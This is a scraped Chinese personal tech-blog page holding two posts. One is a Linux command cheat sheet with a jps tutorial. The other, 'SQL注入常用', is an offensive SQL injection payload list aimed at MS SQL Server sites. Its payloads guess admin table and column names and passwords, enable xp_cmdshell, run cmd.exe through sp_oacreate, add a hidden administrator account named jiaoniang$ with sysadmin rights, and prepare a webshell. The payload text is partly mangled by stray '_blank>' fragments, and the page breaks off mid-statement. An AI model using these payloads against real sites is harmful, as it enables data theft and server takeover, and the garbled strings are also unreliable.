首页
关于
友链
推荐
肥啾解析
百度一下
肥啾GPT
Search
1
宝塔面板登录 phpMyAdmin 提示服务器和客户端上指示的HTTPS之间不匹配
274 阅读
2
Customer complaints evolve with in-car tech
188 阅读
3
JavaScript解析
153 阅读
4
内连接,左连接,右连接作用及区别
112 阅读
5
所谓关系
109 阅读
默认分类
网游架设
手机游戏
python
PHP
Mysql
VBA
C++
JAVASCRIPT
javascript基础
Oracle
生产管理
计划控制
ERP系统开发
APS排产
MES研究
考勤系统
CPA
财管
实务
经济法
战略
审计
税法
藏书架
古典名著
世界名著
编程秘籍
攻防渗透
经管书籍
大佬传经
风雅读物
考试相关
心情格言
拾玉良言
外文报刊
外刊随选
Facebook
Twitter
China Daily
软考
登录
Search
标签搜索
期刊读物
古文
何瑜明
累计撰写
179
篇文章
累计收到
154
条评论
首页
栏目
默认分类
网游架设
手机游戏
python
PHP
Mysql
VBA
C++
JAVASCRIPT
javascript基础
Oracle
生产管理
计划控制
ERP系统开发
APS排产
MES研究
考勤系统
CPA
财管
实务
经济法
战略
审计
税法
藏书架
古典名著
世界名著
编程秘籍
攻防渗透
经管书籍
大佬传经
风雅读物
考试相关
心情格言
拾玉良言
外文报刊
外刊随选
Facebook
Twitter
China Daily
软考
页面
关于
友链
推荐
肥啾解析
百度一下
肥啾GPT
搜索到
179
篇与
的结果
2023-02-07
linux命令集
系统信息 arch 显示机器的处理器架构uname -m 显示机器的处理器架构uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示CPU info的信息 cat /proc/interrupts 显示中断 cat /proc/meminfo 校验内存使用 cat /proc/swaps 显示哪些swap被使用 cat /proc/version 显示内核的版本 cat /proc/net/dev 显示网络适配器及统计 cat /proc/mounts 显示已加载的文件系统 lspci -tv 罗列 PCI 设备 lsusb -tv 显示 USB 设备 date 显示系统日期 cal 2007 显示2007年的日历表 date 041217002007.00 设置日期和时间 - 月日时分年.秒 clock -w 将时间修改保存到 BIOS 关机 (系统的关机、重启以及登出 ) shutdown -h now 关闭系统init 0 关闭系统telinit 0 关闭系统shutdown -h hours:minutes & 按预定时间关闭系统 shutdown -c 取消按预定时间关闭系统 shutdown -r now 重启reboot 重启logout 注销 文件和目录 cd /home 进入 '/ home' 目录' cd .. 返回上一级目录 cd ../.. 返回上两级目录 cd 进入个人的主目录 cd ~user1 进入个人的主目录 cd - 返回上次所在的目录 pwd 显示工作路径 ls 查看目录中的文件 ls -F 查看目录中的文件 ls -l 显示文件和目录的详细资料 ls -a 显示隐藏文件 ls [0-9] 显示包含数字的文件名和目录名 tree 显示文件和目录由根目录开始的树形结构lstree 显示文件和目录由根目录开始的树形结构mkdir dir1 创建一个叫做 'dir1' 的目录' mkdir dir1 dir2 同时创建两个目录 mkdir -p /tmp/dir1/dir2 创建一个目录树 rm -f file1 删除一个叫做 'file1' 的文件' rmdir dir1 删除一个叫做 'dir1' 的目录' rm -rf dir1 删除一个叫做 'dir1' 的目录并同时删除其内容 rm -rf dir1 dir2 同时删除两个目录及它们的内容 mv dir1 new_dir 重命名/移动 一个目录 cp file1 file2 复制一个文件 cp dir/* . 复制一个目录下的所有文件到当前工作目录 cp -a /tmp/dir1 . 复制一个目录到当前工作目录 cp -a dir1 dir2 复制一个目录 ln -s file1 lnk1 创建一个指向文件或目录的软链接 ln file1 lnk1 创建一个指向文件或目录的物理链接 touch -t 0712250000 file1 修改一个文件或目录的时间戳 - (YYMMDDhhmm) file file1 outputs the mime type of the file as text iconv -l 列出已知的编码 iconv -f fromEncoding -t toEncoding inputFile > outputFile creates a new from the given input file by assuming it is encoded in fromEncoding and converting it to toEncoding. find . -maxdepth 1 -name *.jpg -print -exec convert "{}" -resize 80x60 "thumbs/{}" \; batch resize files in the current directory and send them to a thumbnails directory (requires convert from Imagemagick) 文件搜索 find / -name file1 从 '/' 开始进入根文件系统搜索文件和目录 find / -user user1 搜索属于用户 'user1' 的文件和目录 find /home/user1 -name *.bin 在目录 '/ home/user1' 中搜索带有'.bin' 结尾的文件 find /usr/bin -type f -atime +100 搜索在过去100天内未被使用过的执行文件 find /usr/bin -type f -mtime -10 搜索在10天内被创建或者修改过的文件 find / -name *.rpm -exec chmod 755 '{}' \; 搜索以 '.rpm' 结尾的文件并定义其权限 find / -xdev -name *.rpm 搜索以 '.rpm' 结尾的文件,忽略光驱、捷盘等可移动设备 locate *.ps 寻找以 '.ps' 结尾的文件 - 先运行 'updatedb' 命令 whereis halt 显示一个二进制文件、源码或man的位置 which halt 显示一个二进制文件或可执行文件的完整路径 挂载一个文件系统 mount /dev/hda2 /mnt/hda2 挂载一个叫做hda2的盘 - 确定目录 '/ mnt/hda2' 已经存在 umount /dev/hda2 卸载一个叫做hda2的盘 - 先从挂载点 '/ mnt/hda2' 退出 fuser -km /mnt/hda2 当设备繁忙时强制卸载 umount -n /mnt/hda2 运行卸载操作而不写入 /etc/mtab 文件- 当文件为只读或当磁盘写满时非常有用 mount /dev/fd0 /mnt/floppy 挂载一个软盘 mount /dev/cdrom /mnt/cdrom 挂载一个cdrom或dvdrom mount /dev/hdc /mnt/cdrecorder 挂载一个cdrw或dvdrom mount /dev/hdb /mnt/cdrecorder 挂载一个cdrw或dvdrom mount -o loop file.iso /mnt/cdrom 挂载一个文件或ISO镜像文件 mount -t vfat /dev/hda5 /mnt/hda5 挂载一个Windows FAT32文件系统 mount /dev/sda1 /mnt/usbdisk 挂载一个usb 捷盘或闪存设备 mount -t smbfs -o username=user,password=pass //WinClient/share /mnt/share 挂载一个windows网络共享 磁盘空间 df -h 显示已经挂载的分区列表 ls -lSr |more 以尺寸大小排列文件和目录 du -sh dir1 估算目录 'dir1' 已经使用的磁盘空间' du -sk * | sort -rn 以容量大小为依据依次显示文件和目录的大小 rpm -q -a --qf '%10{SIZE}t%{NAME}n' | sort -k1,1n 以大小为依据依次显示已安装的rpm包所使用的空间 (fedora, redhat类系统) dpkg-query -W -f='${Installed-Size;10}t${Package}n' | sort -k1,1n 以大小为依据显示已安装的deb包所使用的空间 (ubuntu, debian类系统) 用户和群组 groupadd group_name 创建一个新用户组 groupdel group_name 删除一个用户组 groupmod -n new_group_name old_group_name 重命名一个用户组 useradd -c "Name Surname " -g admin -d /home/user1 -s /bin/bash user1 创建一个属于 "admin" 用户组的用户 useradd user1 创建一个新用户 userdel -r user1 删除一个用户 ( '-r' 排除主目录) usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1 修改用户属性 passwd 修改口令 passwd user1 修改一个用户的口令 (只允许root执行) chage -E 2005-12-31 user1 设置用户口令的失效期限 pwck 检查 '/etc/passwd' 的文件格式和语法修正以及存在的用户 grpck 检查 '/etc/passwd' 的文件格式和语法修正以及存在的群组 newgrp group_name 登陆进一个新的群组以改变新创建文件的预设群组 文件的权限 - 使用 "+" 设置权限,使用 "-" 用于取消 ls -lh 显示权限 ls /tmp | pr -T5 -W$COLUMNS 将终端划分成5栏显示 chmod ugo+rwx directory1 设置目录的所有人(u)、群组(g)以及其他人(o)以读(r )、写(w)和执行(x)的权限 chmod go-rwx directory1 删除群组(g)与其他人(o)对目录的读写执行权限 chown user1 file1 改变一个文件的所有人属性 chown -R user1 directory1 改变一个目录的所有人属性并同时改变改目录下所有文件的属性 chgrp group1 file1 改变文件的群组 chown user1:group1 file1 改变一个文件的所有人和群组属性 find / -perm -u+s 罗列一个系统中所有使用了SUID控制的文件 chmod u+s /bin/file1 设置一个二进制文件的 SUID 位 - 运行该文件的用户也被赋予和所有者同样的权限 chmod u-s /bin/file1 禁用一个二进制文件的 SUID位 chmod g+s /home/public 设置一个目录的SGID 位 - 类似SUID ,不过这是针对目录的 chmod g-s /home/public 禁用一个目录的 SGID 位 chmod o+t /home/public 设置一个文件的 STIKY 位 - 只允许合法所有人删除文件 chmod o-t /home/public 禁用一个目录的 STIKY 位 文件的特殊属性 - 使用 "+" 设置权限,使用 "-" 用于取消 chattr +a file1 只允许以追加方式读写文件 chattr +c file1 允许这个文件能被内核自动压缩/解压 chattr +d file1 在进行文件系统备份时,dump程序将忽略这个文件 chattr +i file1 设置成不可变的文件,不能被删除、修改、重命名或者链接 chattr +s file1 允许一个文件被安全地删除 chattr +S file1 一旦应用程序对这个文件执行了写操作,使系统立刻把修改的结果写到磁盘 chattr +u file1 若文件被删除,系统会允许你在以后恢复这个被删除的文件 lsattr 显示特殊的属性 打包和压缩文件 bunzip2 file1.bz2 解压一个叫做 'file1.bz2'的文件 bzip2 file1 压缩一个叫做 'file1' 的文件 gunzip file1.gz 解压一个叫做 'file1.gz'的文件 gzip file1 压缩一个叫做 'file1'的文件 gzip -9 file1 最大程度压缩 rar a file1.rar test_file 创建一个叫做 'file1.rar' 的包 rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1' unrar x file1.rar 解压rar包 tar -cvf archive.tar file1 创建一个非压缩的 tarball tar -cvf archive.tar file1 file2 dir1 创建一个包含了 'file1', 'file2' 以及 'dir1'的档案文件 tar -tf archive.tar 显示一个包中的内容 tar -xvf archive.tar 释放一个包 tar -xvf archive.tar -C /tmp 将压缩包释放到 /tmp目录下 tar -cvfj archive.tar.bz2 dir1 创建一个bzip2格式的压缩包 tar -jxvf archive.tar.bz2 解压一个bzip2格式的压缩包 tar -cvfz archive.tar.gz dir1 创建一个gzip格式的压缩包 tar -zxvf archive.tar.gz 解压一个gzip格式的压缩包 zip file1.zip file1 创建一个zip格式的压缩包 zip -r file1.zip file1 file2 dir1 将几个文件和目录同时压缩成一个zip格式的压缩包 unzip file1.zip 解压一个zip格式压缩包 RPM 包 - (Fedora, Redhat及类似系统) rpm -ivh package.rpm 安装一个rpm包 rpm -ivh --nodeeps package.rpm 安装一个rpm包而忽略依赖关系警告 rpm -U package.rpm 更新一个rpm包但不改变其配置文件 rpm -F package.rpm 更新一个确定已经安装的rpm包 rpm -e package_name.rpm 删除一个rpm包 rpm -qa 显示系统中所有已经安装的rpm包 rpm -qa | grep httpd 显示所有名称中包含 "httpd" 字样的rpm包 rpm -qi package_name 获取一个已安装包的特殊信息 rpm -qg "System Environment/Daemons" 显示一个组件的rpm包 rpm -ql package_name 显示一个已经安装的rpm包提供的文件列表 rpm -qc package_name 显示一个已经安装的rpm包提供的配置文件列表 rpm -q package_name --whatrequires 显示与一个rpm包存在依赖关系的列表 rpm -q package_name --whatprovides 显示一个rpm包所占的体积 rpm -q package_name --scripts 显示在安装/删除期间所执行的脚本l rpm -q package_name --changelog 显示一个rpm包的修改历史 rpm -qf /etc/httpd/conf/httpd.conf 确认所给的文件由哪个rpm包所提供 rpm -qp package.rpm -l 显示由一个尚未安装的rpm包提供的文件列表 rpm --import /media/cdrom/RPM-GPG-KEY 导入公钥数字证书 rpm --checksig package.rpm 确认一个rpm包的完整性 rpm -qa gpg-pubkey 确认已安装的所有rpm包的完整性 rpm -V package_name 检查文件尺寸、 许可、类型、所有者、群组、MD5检查以及最后修改时间 rpm -Va 检查系统中所有已安装的rpm包- 小心使用 rpm -Vp package.rpm 确认一个rpm包还未安装 rpm2cpio package.rpm | cpio --extract --make-directories bin 从一个rpm包运行可执行文件 rpm -ivh /usr/src/redhat/RPMS/arch/package.rpm 从一个rpm源码安装一个构建好的包 rpmbuild --rebuild package_name.src.rpm 从一个rpm源码构建一个 rpm 包 YUM 软件包升级器 - (Fedora, RedHat及类似系统) yum install package_name 下载并安装一个rpm包 yum localinstall package_name.rpm 将安装一个rpm包,使用你自己的软件仓库为你解决所有依赖关系 yum update package_name.rpm 更新当前系统中所有安装的rpm包 yum update package_name 更新一个rpm包 yum remove package_name 删除一个rpm包 yum list 列出当前系统中安装的所有包 yum search package_name 在rpm仓库中搜寻软件包 yum clean packages 清理rpm缓存删除下载的包 yum clean headers 删除所有头文件 yum clean all 删除所有缓存的包和头文件 DEB 包 (Debian, Ubuntu 以及类似系统) dpkg -i package.deb 安装/更新一个 deb 包 dpkg -r package_name 从系统删除一个 deb 包 dpkg -l 显示系统中所有已经安装的 deb 包 dpkg -l | grep httpd 显示所有名称中包含 "httpd" 字样的deb包 dpkg -s package_name 获得已经安装在系统中一个特殊包的信息 dpkg -L package_name 显示系统中已经安装的一个deb包所提供的文件列表 dpkg --contents package.deb 显示尚未安装的一个包所提供的文件列表 dpkg -S /bin/ping 确认所给的文件由哪个deb包提供 APT 软件工具 (Debian, Ubuntu 以及类似系统) apt-get install package_name 安装/更新一个 deb 包 apt-cdrom install package_name 从光盘安装/更新一个 deb 包 apt-get update 升级列表中的软件包 apt-get upgrade 升级所有已安装的软件 apt-get remove package_name 从系统删除一个deb包 apt-get check 确认依赖的软件仓库正确 apt-get clean 从下载的软件包中清理缓存 apt-cache search searched-package 返回包含所要搜索字符串的软件包名称 查看文件内容 cat file1 从第一个字节开始正向查看文件的内容 tac file1 从最后一行开始反向查看一个文件的内容 more file1 查看一个长文件的内容 less file1 类似于 'more' 命令,但是它允许在文件中和正向操作一样的反向操作 head -2 file1 查看一个文件的前两行 tail -2 file1 查看一个文件的最后两行 tail -f /var/log/messages 实时查看被添加到一个文件中的内容 文本处理 cat file1 file2 ... | command <> file1_in.txt_or_file1_out.txt general syntax for text manipulation using PIPE, STDIN and STDOUT cat file1 | command( sed, grep, awk, grep, etc...) > result.txt 合并一个文件的详细说明文本,并将简介写入一个新文件中 cat file1 | command( sed, grep, awk, grep, etc...) >> result.txt 合并一个文件的详细说明文本,并将简介写入一个已有的文件中 grep Aug /var/log/messages 在文件 '/var/log/messages'中查找关键词"Aug" grep ^Aug /var/log/messages 在文件 '/var/log/messages'中查找以"Aug"开始的词汇 grep [0-9] /var/log/messages 选择 '/var/log/messages' 文件中所有包含数字的行 grep Aug -R /var/log/* 在目录 '/var/log' 及随后的目录中搜索字符串"Aug" sed 's/stringa1/stringa2/g' example.txt 将example.txt文件中的 "string1" 替换成 "string2" sed '/^$/d' example.txt 从example.txt文件中删除所有空白行 sed '/ *#/d; /^$/d' example.txt 从example.txt文件中删除所有注释和空白行 echo 'esempio' | tr '[:lower:]' '[:upper:]' 合并上下单元格内容 sed -e '1d' result.txt 从文件example.txt 中排除第一行 sed -n '/stringa1/p' 查看只包含词汇 "string1"的行 sed -e 's/ *$//' example.txt 删除每一行最后的空白字符 sed -e 's/stringa1//g' example.txt 从文档中只删除词汇 "string1" 并保留剩余全部 sed -n '1,5p;5q' example.txt 查看从第一行到第5行内容 sed -n '5p;5q' example.txt 查看第5行 sed -e 's/00*/0/g' example.txt 用单个零替换多个零 cat -n file1 标示文件的行数 cat example.txt | awk 'NR%2==1' 删除example.txt文件中的所有偶数行 echo a b c | awk '{print $1}' 查看一行第一栏 echo a b c | awk '{print $1,$3}' 查看一行的第一和第三栏 paste file1 file2 合并两个文件或两栏的内容 paste -d '+' file1 file2 合并两个文件或两栏的内容,中间用"+"区分 sort file1 file2 排序两个文件的内容 sort file1 file2 | uniq 取出两个文件的并集(重复的行只保留一份) sort file1 file2 | uniq -u 删除交集,留下其他的行 sort file1 file2 | uniq -d 取出两个文件的交集(只留下同时存在于两个文件中的文件) comm -1 file1 file2 比较两个文件的内容只删除 'file1' 所包含的内容 comm -2 file1 file2 比较两个文件的内容只删除 'file2' 所包含的内容 comm -3 file1 file2 比较两个文件的内容只删除两个文件共有的部分 字符设置和文件格式转换 dos2unix filedos.txt fileunix.txt 将一个文本文件的格式从MSDOS转换成UNIX unix2dos fileunix.txt filedos.txt 将一个文本文件的格式从UNIX转换成MSDOS recode ..HTML < page.txt > page.html 将一个文本文件转换成html recode -l | more 显示所有允许的转换格式 文件系统分析 badblocks -v /dev/hda1 检查磁盘hda1上的坏磁块 fsck /dev/hda1 修复/检查hda1磁盘上linux文件系统的完整性 fsck.ext2 /dev/hda1 修复/检查hda1磁盘上ext2文件系统的完整性 e2fsck /dev/hda1 修复/检查hda1磁盘上ext2文件系统的完整性 e2fsck -j /dev/hda1 修复/检查hda1磁盘上ext3文件系统的完整性 fsck.ext3 /dev/hda1 修复/检查hda1磁盘上ext3文件系统的完整性 fsck.vfat /dev/hda1 修复/检查hda1磁盘上fat文件系统的完整性 fsck.msdos /dev/hda1 修复/检查hda1磁盘上dos文件系统的完整性 dosfsck /dev/hda1 修复/检查hda1磁盘上dos文件系统的完整性 初始化一个文件系统 mkfs /dev/hda1 在hda1分区创建一个文件系统 mke2fs /dev/hda1 在hda1分区创建一个linux ext2的文件系统 mke2fs -j /dev/hda1 在hda1分区创建一个linux ext3(日志型)的文件系统 mkfs -t vfat 32 -F /dev/hda1 创建一个 FAT32 文件系统 fdformat -n /dev/fd0 格式化一个软盘 mkswap /dev/hda3 创建一个swap文件系统 SWAP文件系统 mkswap /dev/hda3 创建一个swap文件系统 swapon /dev/hda3 启用一个新的swap文件系统 swapon /dev/hda2 /dev/hdb3 启用两个swap分区 备份 dump -0aj -f /tmp/home0.bak /home 制作一个 '/home' 目录的完整备份 dump -1aj -f /tmp/home0.bak /home 制作一个 '/home' 目录的交互式备份 restore -if /tmp/home0.bak 还原一个交互式备份 rsync -rogpav --delete /home /tmp 同步两边的目录 rsync -rogpav -e ssh --delete /home ip_address:/tmp 通过SSH通道rsync rsync -az -e ssh --delete ip_addr:/home/public /home/local 通过ssh和压缩将一个远程目录同步到本地目录 rsync -az -e ssh --delete /home/local ip_addr:/home/public 通过ssh和压缩将本地目录同步到远程目录 dd bs=1M if=/dev/hda | gzip | ssh user@ip_addr 'dd of=hda.gz' 通过ssh在远程主机上执行一次备份本地磁盘的操作 dd if=/dev/sda of=/tmp/file1 备份磁盘内容到一个文件 tar -Puf backup.tar /home/user 执行一次对 '/home/user' 目录的交互式备份操作 ( cd /tmp/local/ && tar c . ) | ssh -C user@ip_addr 'cd /home/share/ && tar x -p' 通过ssh在远程目录中复制一个目录内容 ( tar c /home ) | ssh -C user@ip_addr 'cd /home/backup-home && tar x -p' 通过ssh在远程目录中复制一个本地目录 tar cf - . | (cd /tmp/backup ; tar xf - ) 本地将一个目录复制到另一个地方,保留原有权限及链接 find /home/user1 -name '*.txt' | xargs cp -av --target-directory=/home/backup/ --parents 从一个目录查找并复制所有以 '.txt' 结尾的文件到另一个目录 find /var/log -name '*.log' | tar cv --files-from=- | bzip2 > log.tar.bz2 查找所有以 '.log' 结尾的文件并做成一个bzip包 dd if=/dev/hda of=/dev/fd0 bs=512 count=1 做一个将 MBR (Master Boot Record)内容复制到软盘的动作 dd if=/dev/fd0 of=/dev/hda bs=512 count=1 从已经保存到软盘的备份中恢复MBR内容 光盘 cdrecord -v gracetime=2 dev=/dev/cdrom -eject blank=fast -force 清空一个可复写的光盘内容 mkisofs /dev/cdrom > cd.iso 在磁盘上创建一个光盘的iso镜像文件 mkisofs /dev/cdrom | gzip > cd_iso.gz 在磁盘上创建一个压缩了的光盘iso镜像文件 mkisofs -J -allow-leading-dots -R -V "Label CD" -iso-level 4 -o ./cd.iso data_cd 创建一个目录的iso镜像文件 cdrecord -v dev=/dev/cdrom cd.iso 刻录一个ISO镜像文件 gzip -dc cd_iso.gz | cdrecord dev=/dev/cdrom - 刻录一个压缩了的ISO镜像文件 mount -o loop cd.iso /mnt/iso 挂载一个ISO镜像文件 cd-paranoia -B 从一个CD光盘转录音轨到 wav 文件中 cd-paranoia -- "-3" 从一个CD光盘转录音轨到 wav 文件中(参数-3) cdrecord --scanbus 扫描总线以识别scsi通道 dd if=/dev/hdc | md5sum 校验一个设备的md5sum编码,例如一张 CD 网络 - (以太网和WIFI无线) ifconfig eth0 显示一个以太网卡的配置 ifup eth0 启用一个 'eth0' 网络设备 ifdown eth0 禁用一个 'eth0' 网络设备 ifconfig eth0 192.168.1.1 netmask 255.255.255.0 控制IP地址 ifconfig eth0 promisc 设置 'eth0' 成混杂模式以嗅探数据包 (sniffing) dhclient eth0 以dhcp模式启用 'eth0' route -n show routing table route add -net 0/0 gw IP_Gateway configura default gateway route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1 configure static route to reach network '192.168.0.0/16' route del 0/0 gw IP_gateway remove static route echo "1" > /proc/sys/net/ipv4/ip_forward activate ip routing hostname show hostname of system host www.example.com lookup hostname to resolve name to ip address and viceversanslookup www.example.com lookup hostname to resolve name to ip address and viceversaip link show show link status of all interfaces mii-tool eth0 show link status of 'eth0' ethtool eth0 show statistics of network card 'eth0' netstat -tup show all active network connections and their PID netstat -tupl show all network services listening on the system and their PID tcpdump tcp port 80 show all HTTP traffic iwlist scan show wireless networks iwconfig eth1 show configuration of a wireless network card hostname show hostname host www.example.com lookup hostname to resolve name to ip address and viceversa nslookup www.example.com lookup hostname to resolve name to ip address and viceversa whois www.example.com lookup on Whois database JPS工具jps(Java Virtual Machine Process Status Tool)是JDK 1.5提供的一个显示当前所有java进程pid的命令,简单实用,非常适合在linux/unix平台上简单察看当前java进程的一些简单情况。我想很多人都是用过unix系统里的ps命令,这个命令主要是用来显示当前系统的进程情况,有哪些进程,及其 id。 jps 也是一样,它的作用是显示当前系统的java进程情况,及其id号。我们可以通过它来查看我们到底启动了几个java进程(因为每一个java程序都会独占一个java虚拟机实例),和他们的进程号(为下面几个程序做准备),并可通过opt来查看这些进程的详细启动参数。 使用方法:在当前命令行下打 jps(需要JAVA_HOME,没有的话,到改程序的目录下打) 。 jps存放在JAVA_HOME/bin/jps,使用时为了方便请将JAVA_HOME/bin/加入到Path.$> jps23991 Jps23789 BossMain23651 Resin比较常用的参数:-q 只显示pid,不显示class名称,jar文件名和传递给main 方法的参数$> jps -q286802378923651-m 输出传递给main 方法的参数,在嵌入式jvm上可能是null$> jps -m28715 Jps -m23789 BossMain23651 Resin -socketwait 32768 -stdout /data/aoxj/resin/log/stdout.log -stderr /data/aoxj/resin/log/stderr.log-l 输出应用程序main class的完整package名 或者 应用程序的jar文件完整路径名$> jps -l28729 sun.tools.jps.Jps23789 com.asiainfo.aimc.bossbi.BossMain23651 com.caucho.server.resin.Resin-v 输出传递给JVM的参数$> jps -v23789 BossMain28802 Jps -Denv.class.path=/data/aoxj/bossbi/twsecurity/java/trustwork140.jar:/data/aoxj/bossbi/twsecurity/java/:/data/aoxj/bossbi/twsecurity/java/twcmcc.jar:/data/aoxj/jdk15/lib/rt.jar:/data/aoxj/jdk15/lib/tools.jar -Dapplication.home=/data/aoxj/jdk15 -Xms8m23651 Resin -Xss1m -Dresin.home=/data/aoxj/resin -Dserver.root=/data/aoxj/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImplsudo jps看到的进程数量最全jps 192.168.0.77列出远程服务器192.168.0.77机器所有的jvm实例,采用rmi协议,默认连接端口为1099(前提是远程服务器提供jstatd服务)注:jps命令有个地方很不好,似乎只能显示当前用户的java进程,要显示其他用户的还是只能用unix/linux的ps命令。
2023年02月07日
10 阅读
0 评论
0 点赞
2023-02-07
SQL注入常用
1.判断有无注入点; and 1=1 and 1=22.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count() from )and 0<>(select count(*) from admin) —判断是否存在admin这张表3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个and 0<(select count(*) from admin)and 1<(select count(*) from admin)4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.and 1=(select count() from admin where len()>0)–and 1=(select count(*) from admin where len(用户字段名称name)>0)and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止and 1=(select count() from admin where len()>0)and 1=(select count(*) from admin where len(name)>6) 错误and 1=(select count(*) from admin where len(name)>5) 正确 长度是6and 1=(select count(*) from admin where len(name)=6) 正确and 1=(select count(*) from admin where len(password)>11) 正确and 1=(select count(*) from admin where len(password)>12) 错误 长度是12and 1=(select count(*) from admin where len(password)=12) 正确6.猜解字符and 1=(select count(*) from admin where left(name,1)=a) —猜解用户帐号的第一位and 1=(select count(*) from admin where left(name,2)=ab)—猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) —这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的 ASSIC码就OK.最后把结果再转换成字符.group by users.id having 1=1–group by users.id, users.username, users.password, users.privs having 1=1–; insert into users values( 666, attacker, foobar, 0xffff )–UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable-UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id)-UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)-UNION Select TOP 1 login_blank>_name FROM logintable-UNION Select TOP 1 password FROM logintable where login_blank>_name=Rahul–看_blank>服务器打的补丁=出错了打了SP4补丁and 1=(select @@VERSION)–看_blank>数据库连接账号的权限,返回正常,证明是 _blank>服务器角色sysadmin权限。and 1=(Select IS_blank>_SRVROLEMEMBER(sysadmin))–判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)and sa=(Select System_blank>_user)–and user_blank>_name()=dbo–and 0<>(select user_blank>_name()–看xp_blank>_cmdshell是否删除and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = X AND name = xp_blank>_cmdshell)–xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll–;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:inetpubwwwrootxplog70.dll–反向PING自己实验;use master;declare @s int;exec sp_blank>_oacreate “wscript.shell”,@s out;exec sp_blank>_oamethod @s,”run”,NULL,”cmd.exe /c ping 192.168.0.1″;–加帐号;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$ 1866574 /add–创建一个虚拟目录E盘:;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:inetpubwwwrootmkwebdir.vbs -w “默认Web站点” -v “e”,”e:”–访问属性:(配合写入一个webshell)declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse爆库 特殊_blank>技巧::%5c= 或者把/和 修改%5提交and 0<>(select top 1 paths from newtable)–得到库名(从1到5都是系统的id,6以上才可以判断)and 1=(select name from master.dbo.sysdatabases where dbid=7)–and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)依次提交 dbid = 7,8,9…. 得到更多的_blank>数据库名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 adminand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=adminand uid>(str(id))) 暴到UID的数值假设为18779569 uid=idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_blank>_idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in(id,…)) 来暴出其他的字段and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用户名依次可以得到_blank>密码。。。。。假设存在 user_blank>_id username ,password 等字段and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)得到WEB路径;create table [dbo].[swap] ([swappass]char);–and (select top 1 swappass from swap)=1–;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots, @value_blank>_name=/, values=@test OUTPUT insert into paths(path) values(@test)–;use ku1;–;create table cmd (str image);– 建立image类型的表cmd存在xp_blank>_cmdshell的测试过程:;exec master..xp_blank>_cmdshell dir;exec master.dbo.sp_blank>_addlogin jiaoniang$;– 加SQL帐号;exec master.dbo.sp_blank>_password null,jiaoniang$,1866574;–;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;–;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;–;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ /add;–exec master..xp_blank>_servicecontrol start, schedule 启动_blank>服务exec master..xp_blank>_servicecontrol start, server; DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user jiaoniang$ 1866574 /add;DECLARE @shell INT EXEC SP_blank>_OACreate wscript.shell,@shell OUTPUT EXEC 